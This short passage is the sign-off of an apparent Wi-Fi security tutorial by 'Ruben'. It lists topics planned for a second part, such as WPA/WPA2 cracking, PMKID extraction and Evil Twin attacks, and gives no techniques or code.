Part 2 will cover the advanced attacks: cracking WPA/WPA2, PMKID extraction, WPS vulnerabilities, WPA3 Dragonblood, enterprise network exploitation, Evil Twin attacks, and captive portal bypasses.
Thanks for reading, and happy hunting!
— Ruben